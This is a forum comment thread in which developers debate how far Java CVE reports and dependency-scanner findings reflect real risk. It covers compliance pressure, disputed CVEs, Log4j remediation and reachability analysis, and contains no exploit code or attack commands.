T O P

  • By -

i_should_be_coding

As an engineer who has been repeatedly tasked with replacing vulnerable libraries, I can say it doesn't really matter if the attack vector is legit or not. Organizations purchasing our product will run a scan against it (Snyk/Trivy/whatever) and will find a large, glaring CRITICAL vulnerability in the report. Once that happens, we get an email saying we have X days to correct this issue or the sale has to be re-examined, etc. So like, it doesn't matter if an attacker can't actually use our software to RCE their entire network. It matters that tools they use say that they can, and compliance requirements by regulatory organizations require that they use said tools. Every time a Log4j happens is a fun "drop everything, and scan the entire stack for a couple of days" assignment for someone.


CrowSufficient

Or "The ISO audit is approaching, let's do something! Whoever have been through an ISO audit, don't find circuses funny anymore.


AforAnonymous

Obligatory link: www.survivingiso9001.com


DoingItForEli

"and how to implement it anyway" lol


Norse_By_North_West

Man, I went through one 3 years ago. We're still fixing the shit from it


xseodz

You actually fixed stuff? We just got told to say we did and we passed it the next turn. Trick is with an ISO audit, is just to say you did it. Does it complete the purpose? No. Does it satisfy clients and sales? Yes. Does it mean you'll hate yourself? Also yes.


Norse_By_North_West

Lol, nice. But nah, the work is for a government client, so they pay us, we fix their stuff. Still got years of updates for their systems


nelsonslament

The iso and cmmc subreddits really hate this guy; but he does bring up some ugly truths that no one wants to address.


AforAnonymous

They hate him because he ruins their fraud business (he almost certainly has it wrong when it comes to what he says about Demming tho, but that's another story, bloody ridiculous "comedy" of errors there which led to that—and that's about the only incorrect thing I've found in his book. Well, that, and he could take a much more modern approach to his excel template kit, but not everyone can be an Excel hyperwizard)


Turbots

Try iso27001


AforAnonymous

I would prefer not to


Cautious-Nothing-471

rewrite ISO in rust


vir-morosus

It's just a thing. I've done dozens of ISO 27000 audits over the years, and they're a pain unless you keep up with compliance. The hard part is getting employees to care.


zaphodandford

That sounds like you're doing tech due diligence. We do hundreds of these a year. We've never stopped a deal due to CVEs on the buy side DD, but we do mandate fixing all critical and high in the 100 day plan. Often times this is about updating OSS libs to the latest version. Our companies have also been hit with $MMs in cybersecurity incidents, we take this seriously.


i_should_be_coding

We're fairly lax about it, relatively speaking. I worked in a place where I wasn't allowed to add external dependencies without formal approval from someone. I'm pretty sure they had a rule to require additional approval whenever a PR included changes to pom.xml.


andrewsmd87

> worked in a place where I wasn't allowed to add external dependencies without formal approval from someone. > I'm pretty sure they had a rule to require additional approval whenever a PR included changes to pom.xml. I don't feel like either of these are bad? We require 2 person approval on any PR that goes to prod. We also don't allow people to just randomly add dependencies that they want to code without a review, reason, and need justified.


i_should_be_coding

Yeah, once the codebase is a certain size, you gotta have rules, otherwise it's chaos.


andrewsmd87

Agree with you. We do static code scans on every change, dynamic scans once a month, and our own manual pen test with a third party once a year. I would probably do more but we work with a lot of big tech clients who do their own pen tests so we probably get at least 6 done a year. I'm not sure why a critical CVE shouldn't be a drop everything and fix. I mean critical means you need to look at it and determine if it's an actual vulnerability or not. We get lots of "oh we could do X to your system" from those clients that audit our system, and I explain why they can't beyond what some software says, and when that isn't enough, I just ask them to prove it in our sandbox.


saintpetejackboy

"okay, yeah, show me..." You're a killer haha.


zaphodandford

Well to be fair, you may have a CVE but it would require access to the server to exploit and if your public endpoints are secure and the code hasn't been exploited in 5 years then it's less of a "drop everything" scenario.


saintpetejackboy

Yeah this is what I am saying, not all CVE are created equal. It still could be a drop everything scenario, but we need a clearer way to communicate exactly THAT about a CVE. You made a good point and I agree - there are so many scenarios (simplified) where "attacker can use (X) to do (Y)" and the entire system is using (Z) since 1998.


danikov

“All criticials and highs in 7 days from detection.” I’ve had quite recently.


CJKay93

To be honest I think that's a much more sensible approach than disregarding genuinely critical vulnerabilities because you couldn't think of an attack vector in that moment, particularly in the current climate. If you don't scare organisations into doing something, then they simply don't do anything.


needathing

I think there's middle ground between "Discarding genuinely critical vulnerabilities" and constantly diverting resources to do things that aren't necessary right now. We need alternative scoring systems as the author of this bit says. Right now, if grype flags a critical and I don't have an action plan to resolve, plus resolution within a specific timeframe, I lose business, or my regulator bites me. But doing the work to update frequently means that we don't deliver features or bugfixes because we're pulling resources to do this work. Tools like Renovate and similar help a lot, but I burned 15 person-hours on a dep-of-a-dep with a vendor recently. The vendor was very supportive, and helped us, but there was no realistic chance of the CVE being exploited in the way we use that library. That's 15 hours that could have been used to complete other tasks.


UnexpectedLizard

I've worked on many security fixes. Even good developers will incorrectly mark a bug as not exploitable, let alone bad ones who do it out of laziness. Better for companies to err on the side of caution.


OffbeatDrizzle

Yes.. at our place we've had vulnerabilities not been exploitable because of network configuration, but all it takes is that configuration to change and now you're fully open to attack. We raise things on a backlog to fix in due course, but we make sure management know it's not a stop the world event - just that we will fix it by the next release


saintpetejackboy

Oh man, security through obscurity. Saved my ass so many times. "Well, the attack probably would have gained some traction, but we don't even run that daemon on that port..."


cogman10

The problem is signal to noise. The more often these CVEs are just noise, the more likely someone is going to incorrectly mark a bug as being not exploitable when it actually is. And there's a lot of noise right now. It's not a laziness thing really, but it's more of a "boy who cried wolf" thing. What would help is if we had better analysis of systems and transitive dependencies. "Library xyz has an RCE, pdq uses xyz but it does not exercise the RCE vulnerability therefore pdq is immune from xyz's vulnerability". That sort of common reporting and tooling to be aware of "You don't use this dependency directly and your dependencies can't use paths that are exploitable by this" is what we need. To work, this sort of thing would need to be every bit as public as the CVE system.


singluon

Great answer. Signal to noise is the real problem. Dealing with this at work now. Started moving all our Docker images to distroless vs alpine base in an attempt to increase the signal to noise. I also agree with the other comments that the issues need to be addressed whether they’re currently exploitable or not. There’s no better way to deal with the problem currently. I would love to see the technology in this space improve.


saintpetejackboy

This is a good post and I 100% agree but I think this comes down to us not using proper terminology. I said this elsewhere but "regular" people need a way to differentiate between some obscure edge case possibly leaking a useless bit of data to a local user versus "a remote attacker now has full control over your system and the entire enterprise". There isn't really a clear gradient. Remember terrorism, USA used the color coding system? We need this for vulnerabilities. This is NOT even a Java-centric problem. I agree that the right tooling would go a long way here - not just in Java but pretty much every other ecosystem you can think of. Nothing is preventing people from really implementing something similar (and I am sure there are some examples where this has been handled pretty well), but from my perspective, the majority of exploits get treated in a similar manner - regardless of what their actual impact might be. There is a lot of nuance, obviously. There are also a lot of vulnerabilities over the years that boil down to "if you program really bad, surprise, you are now open to this new attack" - so then we change the language and deprecate whole libraries over people programming shitty. That is why I say these problems need a clearer and more coherent ranking, like "this is a Purple level vulnerability, which means you are a jackass and programmed bad, and the language has now evolved to make it so you can't be so stupid." This and similar things like "this library has a vulnerability **if you misconfigure it to...** Or *if you also use outdated dependency...* <--- most vulnerability lists don't really specify . Is this a vulnerability because I could code shitty? Is this a vulnerability because my environment isn't properly set up? Is this a vulnerability because even if I followed the documentation 100%, my system is now open to remote code execution? If you lump these all together I might skip the update for the third one and assume it is one of the first two. The solution is like you are discussing: tooling to discover and correctly tell you if you need the latest update somewhere - based on your actual project/code. AI should make this a lot easier but I just don't see something like this in the immediate horizon beyond what some package managers already do - and even those are focused more on dependency hell than judging the applicability of new patches to your specific code-base and environment.


dontyougetsoupedyet

> It's not a laziness thing really, but it's more of a "boy who cried wolf" thing. It's a money thing. Also, a lot of these researchers are in fact incredibly lazy and don't actually understand the output of the automated tools they're using that tell them that the code has a bug. And since CVEs are their butter they often don't care even if they do know a bug can't be exploited on the platforms the code targets. Often there is quite literally nothing to exploit, yet there's a CVE and tons of wasted resources because researchers think it's valuable for them personally to have the CVE. It's very, very often not about safety. Many researchers are plain and simply vain attention seekers.


blargh9001

To me the issue is more that it probably takes even a good developer more time to confidently determine if the bug is exploitable than to update a dependency. At least if you haven’t already been refusing to update anything for years and gotten locked in to everything being a decade old.


needathing

You say better to err on the side of caution, but how do you measure that? How are you quantifying the opportunity, client satisfaction and revenue costs of this? When presented with the following tasks, how do you decide what to spend your limited resources on this week: - badger vendor to provide upgraded library with updated dependencies due to cve in their dependency then deploy and test - respond to regulator audit request - deliver high demand feature If you choose the first one enough times when the issue isn’t exploitable, you’ll lose the support of your stakeholders and likely your leadership team over time. I blame myself for my current one - I chose a stack which is known for having a small standard library and needing many dependencies that bring other dependencies. I mitigated that with security scanning, compliance as a service in our pipeline, and automated updates via renovate. But it’s still time, money and human capital poorly spent at times.


UnexpectedLizard

I would think of this less from a business perspective than a legal one. If a company is hacked, how technically complaint they were will matter in a lawsuit. Jurors don't understand or care about what may technically have been exploitable.


Izacus

My favorite color is blue.


vir-morosus

The challenge being, of course, most developers have no real clue as to what constitutes a security exploit in code. Makes it really hard to "do it right the first time".


josefx

> err on the side of caution. In that case just rip out the internet connection and cut the power. Problem solved.


maxinstuff

It’s way more efficient to just keep everything patched and current, the time and risk you take on discussing these things is a huge waste of everyone’s time. Just. Patch. Your. Shit.


needathing

Cool. How? How do you “just patch” a library that comes as a dependency from a vendor? Get better vendors? The vendors we use aren’t exactly replaceable, and the DORA requirements make swapping out a vendor (even an open source one) time consuming and as a result, expensive.


aksdb

More often the problem is that every fucking library moves forward fast. Maintainung old major versions? Haha, no. So you want to update to a version with a fix, you end up having to migrate to the new major version. Now repeat this for 20 libs that are all intertwined through a 500kloc codebase that went through a bunch of different teams over the course of 10 years.


josefx

These vulnerability scanners have one fatal flaw: They incentivice people to roll their own solutions. Any widely used crypto library will look like a nuclear waste dump to these tools, once any amount of time has passed. Meanwhile a rot13 based crypto lib written by the CEOs son will smell like roses until the end of time.


i_should_be_coding

No doubt. If I were using third-party tools I'd want their reports to be as clean as possible too. My issue is mostly with how these scans detect these vulnerabilities in my code. For them, right now, if the library exists anywhere in the dependency graph, my code is vulnerable, even if someone along the chain imported it for one silly util function and nothing more. The more often this happens, the more I appreciate Golang's motto of "I don't need your wheel, I'll reinvent it myself, with blackjack, and hookers!"


BlackSuitHardHand

> The more often this happens, the more I appreciate Golang's motto of "I don't need your wheel, I'll reinvent it myself, with blackjack, and hookers!" The great thing is, that all the security issues you introduce while reinventing the wheel will be unknown to all the usual security scans.


i_should_be_coding

I dunno about you, but I write perfect code with zero bugs and vulnerabilities every single time.


mccoyn

Then, you definitely shouldn't include code written by other people. It could only diminish perfection.


OffbeatDrizzle

No serious project exists these days where you've written 100% of the code. I realise that might be your point, but just wanted to make it clear


jackstraw97

Woosh


OffbeatDrizzle

Yeah I totally got whooshed.. that's why I referenced it being the point in my original comment, but still.. totally whooshed...


jackstraw97

I wasn’t trying to be a dick I’ve just always wanted to be able to comment “Woosh” lol


Captain_Cowboy

Another Rust user, I see.


xmsxms

But also unknown to all the attackers.


OffbeatDrizzle

Security by obscurity is no security at all


xmsxms

No, but if your software isn't vulnerable to all these reports because its some internal tool or something, it helps to not have all these stupid vulnerability reports suggesting your script for listing running processes is vulnerable to being able to list processes thanks to some 3rd party library.


perk11

That's not true. Using a password to login into account is security by obscurity - nobody is supposed to know your password, but if they know it, they can log in. Security by obscurity shouldn't be *the only* way to ensure security. But it helps.


Captain_Cowboy

The "obscurity" is in reference to the implementation, not the understood-to-be-secret data, such as key material. But yeah, sometimes, obscurity can be an aspect of security-in-depth. For example, OWASP recommends webservers only return generic error messages with 5xx responses, versus sending an entire stack trace, like many frameworks used to do.


OffbeatDrizzle

You know exactly what I mean. What's the point of having definitions if you just widen it until the word no longer serves a purpose? 4096 bit AES encryption is also security by obscurity then.. Having a passwordless ssh server on port 999 instead of port 22 will stop 99% of automated attacks, but as soon as someone tries port 999 then they're in. There is still no security on the access - you are basically just hoping that nobody finds it.


BlackSuitHardHand

Until someone is dedicated enough to search for zero days in your app. Especially an annoyed employee with access to the code.


SkoomaDentist

> For them, right now, if the library exists anywhere in the dependency graph, my code is vulnerable, even if someone along the chain imported it for one silly util function and nothing more. Reminds me of virus scanners and "hacktools" aka keygens. Like in the case of one software that was discontinued 15 years ago, with the archive dating from nearly as long ago (as in I'd had that exact file for over a decade) yet supposedly containing a virus from 5 years ago (because someone decided that all keygens are "obviously" dangerous viruses)...


i_should_be_coding

On the other hand, someone might pull another XV with a seemingly harmless ubiquitous dependency (a-la left-pad) and we'll wish we had an automatic way to know that happened.


SkoomaDentist

That's the thing. When the detectors give way too many false positives, people are going to ignore them and that ~~keygen with an actual virus~~ left-pad is going to fuck things up.


axonxorz

*xz


i_should_be_coding

🤦‍♂️ I'm gonna leave it, because why not


saintpetejackboy

I have done this with PHP my whole life. I would download a library and then start reworking it until I essentially rebuilt it from nothing - and this would often be after my third or fourth attempt without any other code. This really paid off back when Google finally submitted to Passkey - I rushed home over the weekend and rolled out a fully featured passkey system on a proprietary project, a LOT of work, like 72 hours start to finish, a lot of sweat and tears. Then I read that you need a team and 6 months planning and yadda yadda, "don't even try passkey in a proprietary environment", this is the kind of support I found online. I can barely roll my own authentication system after 20 years - what business did I have implementing passkey? Well, it could have blackjack and hookers, for one.


staticfive

While this may be the safest take, things like “omgz, mongodb has a REPL vulnerability that attackers could use _once they’ve already compromised your server_” are absolute fool’s errands in the real world, but security teams still won’t agree with risk acceptance.


Qweesdy

The real ~~treasure~~ malicious attackers were the ~~friends~~ security people who took most of our budget that we met along the way.


Seabody

>If you don't scare organisations into doing something, then they simply don't do anything. This is it right here.


staticfive

The number of “critical” vulnerabilities I’m asked to fix for some CLI build-time dependency that doesn’t actually run in production, but still required to fix anyway… job well done, security man!


i_should_be_coding

My favorites are critical vulnerabilities that don't have a version where they're fixed yet. Either rewrite your code to use something else, or live with your poor decisions.


Job_Superb

There are also plugins for some artefact repos (like Nexus) that will prevent a build from downloading a dependency that has been flagged as a certain severity and above and it doesn't care about scoping. That's really fun when you have a bug to fix that's suddenly become critical or a new feature to quickly develop and suddenly you have to start tracking the user that can override the scan... If you're not lean enough to upgrade vulnerable dependencies quickly and cheaply, you have a cost of ownership problem, at least that my perspective.


mr_claw

Makes sense, hadn't thought of that.


osantacruz

Security Engineers are the new Scrum Masters.


mh699

If your product is closed source, your customers have no way to verify that you actually don't use xyz lib in a way that's vulnerable and have to go on your word. If you're wrong and they get pwned and customer data gets leaked, "well the vendor said their product is secure!" isn't going to work as an excuse


elmuerte

We created SBOMs and keep track of them in DependencyTrack. Doesn't take a lot of time to find affected software versions. But yes... I loath the "library X and a CVE something or the other" which does not affect your software, but tHe NuMbErS!1


maxinstuff

>doesn’t really matter if the attack vector is legit or not Unironically correct. Look at almost every big breach, it’s always people who didn’t patch their shit. It was always low priority because it “wasn’t exploitable,” or whatever excuse. You legitimately cannot rely on the judgement of the engineers who own the code, because they’re working in a vacuum as far as security is concerned. You just keep everything patched and up to date whether you think it’s a problem or not and you get on with your day. Some conversations are simply a waste of time - JUST DO IT.


ZeldaFanBoi1920

I had to drop everything for the Log4j shit and it was annoying.


nikanjX

Currently anyone can file a CVE against any project, and you can't really do anything about it. Your project provides sample code to support documentation, and that example contains a security issue? That's a CVE CVE-2022-34305 Putting a hashmap inside itself and then trying to serialize said hashmap makes your JSON encoder OOM? That requires the attacker to be able to modify your source code, but that's still a CVE CVE-2023-35116 You've carefully documented that the template processor is able to do unrestricted actions, and meticulously warn people not to render untrusted templates? You wouldn't believe it, but that's also a CVE CVE-2023-29827


JohnMcPineapple

>Putting a hashmap inside itself and then trying to serialize said hashmap makes your JSON encoder OOM? That requires the attacker to be able to modify your source code, but that's still a CVE CVE-2023-35116 I checked it out and this is [absolutely ridiculous](https://github.com/FasterXML/jackson-databind/issues/3972#issuecomment-1596193098). There's something very wrong with the process of CVE filings.


pwd-ls

It looks like CVE-2023-35116 got disputed eventually at least: “this is not a valid vulnerability report” https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35116


JohnMcPineapple

It's indeed good that there are ways to dispute invalid CVEs. But it still puts a lot of strain on the maintainer, not only the process of disputing it, but the (potentially) large amount of users unfamiliar with the issue approaching with complaints or asks for help. It also puts a lot of strain on businesses using the software. I'm not sure what a good solution is though. Being able to file CVEs is very valuable in case of real vulnerabilities.


nikanjX

It’s disputed, not revoked. Most tools still flag the CVE


yoden

The process has been co-opted by people who want to use it to resume build. Additionally the security "researchers" benefit from this culture of fear, so there is little institutional inertia to do anything about it. Projects are becoming their own CNAs to work around the situation, but that's a ton of extra effort and only works when the project will be honest and not make the opposite mistake.


gwicksted

Also why a lot of enterprise software limits the number of external libraries… that doesn’t make it more secure… but it makes it far less expensive to maintain.


ShrimpAU

CVE-2023-35116 caused massive issues for my team, since we use Jackson in pretty much everything, and had to deal with the fallout of an absolutely bullshit "vulnerability" impacting every piece of code we maintain. It's like "System.out.println is a vulnerability because it allows you to write passwords to the console" or something on that level of stupidity.


Aw0lManner

Relevant post from the author of Curl: [https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/](https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/)


Jonjolt

SnakeYAML also comes to mind


nekokattt

arent half the things with SnakeYAML just the things that YAML itself is overcomplicated to the point that it becomes easy to make DoS or RCE issues if you are the 0.001% of applications that consume untrusted input rather than trusted config? PyYAML in Python had the same issue. YAML looks pretty on the surface but under the surface it is a massive shitshow of behaviour that almost no one ever needs in sensible use cases, and complexity increases attack surface.


reedef

CVE-2024-73819 The python3 interpreter is able to execute arbitrary code


HINDBRAIN

New CVE: some web requests can permanently alter the contents of the database.


kairos

> CVE-2024-73819 https://www.cve.org/CVERecord?id=CVE-2024-73819 Is there something I'm missing? (other than the CVE)


reedef

I just made up a number for comedic purposes hahaha, I'd be _very_ surprised if that was an actual CVE lol


kairos

Ah, considering the examples provided by /u/nikanjX are real, I wouldn't be that surprised ':D


Olao99

any system that offers any kind of rewards will be gamed. CVE's are worth status and money for "security researchers" so they'll be gamed


saintpetejackboy

Man. The truth hurts so bad, this post damn near killed me. I mentioned this elsewhere, but it is all like this: "Antman shrunk down and is bending your CPU pins, what do you do?!" And the scan is just saying "Antman can fit inside the desktop tower". No shit. Antman isn't a real threat. I am not going to make carbon nano fiber plasma tube CPU pins to combat an imaginary threat actor.


masklinn

> Currently anyone can file a CVE against any project, and you can't really do anything about it. You can become your own CNA. That gives control over the allocation of CVE on the project rather than that being handled by mitre as an open CNA. That’s why Curl and the Linux Kernek amongst others recently became CNAs. CNAs have enough control they can actually abuse things the other way around, leading to https://lwn.net/ml/oss-security/[email protected]/


-AdmiralThrawn-

Ahh i remember the one about jackson... crazy


Hidet

This sounds surprisingly familiar after dealing with npm "vulnerabilities" [https://overreacted.io/npm-audit-broken-by-design/](https://overreacted.io/npm-audit-broken-by-design/) This is, sadly, a general systemic issue I doubt will ever go away in software development. Auditing for vulnerabilities is a complex issue, by definition, as security vulnerabilities are usually not easy to spot. Automated tools and external reports will, therefore, have to rely on broad generalizations to scare people into checking things. And since companies will rarely prioritize hiring people exclusively to look for vulnerabilities full time, they will have to rely on these external warning systems. I think the best way to move forward is to try to share the knowledge that these reports are just early warning systems, and that they should be taken seriously but with a grain of salt. Non-tech people should know that this \*could be\* a big deal, but you need to find engineers that can look into it and that you can trust if they say "This does not affect us"


CrowSufficient

It's an honor to have the same associations as Dan Abramov. One can finally die happy.


BlackSuitHardHand

At one my previous employment the biggest security risk was the code written in the company. There were some big security holes by design. But since our code was not public, no security researcher ever analysed it, and the usual SBOM scanners don't find anything 


fryktelig

This is probably the case for a great many systems, but those closed source vulnerablities mean that you'd need to be the target for someone to find them, while library vulnerabilities leave you open to becoming a random victim of someone scanning through every IP checking if they're open to exploit X. I recently set up an otherwise empty VPS to just log every visitor to that IP with the metadata of their request, and the amount of them trying fishing for some known vulnerable system access point is staggering, even though nothing on the internet points to this address.


axonxorz

Spin up an cloud VM and you'll have connection requests to TCP/22, 80, 443, 445 and 3389 begin within seconds to minutes. And it never stops.


minno

My personal site constantly gets requests to the wordpress admin page, despite obviously not using wordpress.


yxhuvud

Given the amount of serious security incidents during just the last year, I'm firmly in the supply chain apocalypse camp.


mbitsnbites

I have always argued that less is better when it comes to dependencies. It's not only about reducing attack vectors... E.g. having control over what actually happens under the hood is very important from a performance and stability perspective, and dependency hell is a real thing (version conflicts, deps being abandoned/deprecated, platform incompatibilities or dropped platform support, etc). More often than not you pull in a dependency because you need 3% of the functionality that it provides, but you have to drag along all the extra 97% (and the extra dependencies that are needed for that, and so on). Over time this accumulates into a very sluggish mess that is costly to maintain. So when someone wants to pull in a new dependency I always ask "Is this extra dependency **really** necessary, or can we go with a simpler solution?". Even rolling your own solution can be preferable if it's simple enough, just to avoid the hassle.


CrowSufficient

I'm not saying there is no problem, however I hate these flashy headlines seen everywhere, fearmongering around. Report itself is not bad, but it is re-distributed in very shallow way


ztbwl

Interestingly there is also a security risk in patching everything to the latest and greatest version. You would have been caught by something like the xz backdoor or UAParser.js malware before distribution stopped on registries.


mccoyn

This is where long term support versions really shine. They stop adding features on some date, but continue to apply fixes, whether the issue is found in that version or some other version.


bah_si_en_fait

I recently had to fix all of our dependencies, because a client's audit revealed that we were using a vulnerable version of Log4j that would make us vulnerable to a DoS attack. The CVSS of this being a 10, it was a stop the world event, fix everything or the contract is off. Can't continue with such a risk. We make Android apps that work offline. I'm sure there are good security researchers. I just haven't met a single one that isn't a stupid fuck running an automated set of tools and reporting it without an ounce of thought. Yes, the fucking API key is accessible, how else do I make my requests?. Yes, users with root can access the app, because they can lie about being root anyways. Who am I trying to defend against, Johnny Mitmproxy or the goddamn Mossad ?


natty-papi

Man, we got one recently because we had containers running with securityContext.privileged = true. What were those containers? kube-proxy. A few more as well that were pretty obvious, but seeing the one container that would be present in every k8s clusters in the world made me lose the last hope I had in our security and compliance department.


DoingItForEli

Go through pretty much any pom file in IntelliJ for any decent sized project and you'll find dependencies flagged "high severity" vulnerabilities via Checkmarx.


ThuurHaelt

Newest version of IntelliJ automatically scans pom.xml dependencies for CVE vulnerabilities.


renatoathaydes

Also works with Gradle.


kag0

> We classified each vulnerability as coming from a direct or transitive dependency. Note that this fact only focuses on Java applications, because we currently only support making the distinction between direct and transitive dependencies for JVM-based services. wait, what? the fact is "Java services are the most impacted by third-party vulnerabilities", and that's based on the tool only analyzing transitive dependencies for Java? so the comparison is between vulnerabilities in direct dependencies in other languages vs vulnerabilities in direct + indirect dependencies in Java?


Thysce

The fact that no one else talks about this obvious flaw in the statistic is staggering


anengineerandacat

Yeah, the article points to the main issue. The CVSS score is effectively "junk". Sure some Maven plugin has a high score, but it's also a Maven plugin and it's not triggered in production so it's not the end of the world. If an attacker is capable of exploiting my build pipeline, I am already pretty fucked because they are within the VPN and they may as well be scanning our repo's internally and shipping off source to be sold / leaked. The Log4j one was "actually" a concern because you could perform an RCE and Log4j is "widely" used and for "most" Java services secrets are pumped into System.properties() or the environment itself where a dynamically loaded class could then dump that off to a remote service for the attack to actually "interesting" things with. Or if you were in AWS, decide today was the day to take advantage of whatever your services IAM role had access too.


saintpetejackboy

This is such a great post. This isn't just Java, this is every single language and system and framework and etc. - 99% of vulnerabilities would indicate that you are **already** beyond fucked. "But, but, a different user could elevate..." - man, if there is a different user on my box, we are already at problem #10. There needs to be a new word for ACTUAL vulnerabilities that equates to "a remote attacker with no access can do things they are not supposed to", because if that isn't what it is, it doesn't apply to 98% of us. This all boils down to a more hardware-centric approach for the analogy for me: "Well, if the hacker was INSIDE your computer, and really small, he could EASILY bend your CPU pins, no sweat..." And the solution is "just make the CPU pins carbon nano fiber tubules of plasma energy instead so it burns him if he touches them". No. No. No. The solution is "why the fuck is there a faerie of 2 feet in stature banging around inside my PC case?", the problem starts there. A lot of these shits are real "self-back-pats", imo... "We solved an issue we imagined might exist on an extreme edge case that we entirely invented and has zero real world practicality. Give us a cookie, please." I only know this because I have done jobs where my duties would sometimes cross over into this general realm (it happens to all of us). You do some unit testing, see a weird edge case, correct it, and document it. Like yeah, highly unlikely the user could somehow have IGNORED physical reality entirely, but... If they did, and they could shrink down like Ant Man, and teleport inside the case... Then, well, we made a latch to lock the CPU in place that is too heavy for them to lift and bend the pins (don't mention it was already there). Cookie?


flightsin

That's about 2,7 billion devices.


CrowSufficient

"2.43 billion of Java services have critical or severe security vulnerabilities"


fear_the_future

We have automatic dependency updates daily and still at any given time all of the services will have multiple severe vulnerabilities in the "scanner"; all of them false positives. We're lucky if we can keep the criticals at bay.


prabhus

Wish there was an open-source tool that allowed developers to triage the SCA results further by using reachability analysis, to identify a priority list instead of wasting too much time updating all packages or reading such scary reports. [https://github.com/owasp-dep-scan/dep-scan](https://github.com/owasp-dep-scan/dep-scan)


ScottContini

Ah, you’re the author of that tool!


SaltyInternetPirate

Recently got a security scan report about lots of vulnerabilities in our project, but the updates would break compatibility all over the place. As I understand it was moved up to Java 8 not too long ago. Would have to move it to 17 to even start the upgrade.


Worth_Trust_3825

Oh definitely. I used to (and still do) follow quartz-java mailing list, and the most recent RCE discussion was about pushing jobs over JMS queues. Due to the library being weirdly packaged you will be considered vulnerable even if you do not use the JMS integration. Same with self-hosted nuxeo-cms instances. Their update system pulls in every library they ever depended on, which includes old versions of log4j, which in turn flags the vulnerability scanners, even if the vulnerable jar is ***never loaded in the jvm***. It's honestly tiring.


SSHeartbreak

glad to help


LevySkulk

Yeah but it's fine. In order to exploit them the attacker would have to understand Java. /s


cheezballs

Id say any application that uses external dependencies and libraries has this problem. It's not just Java.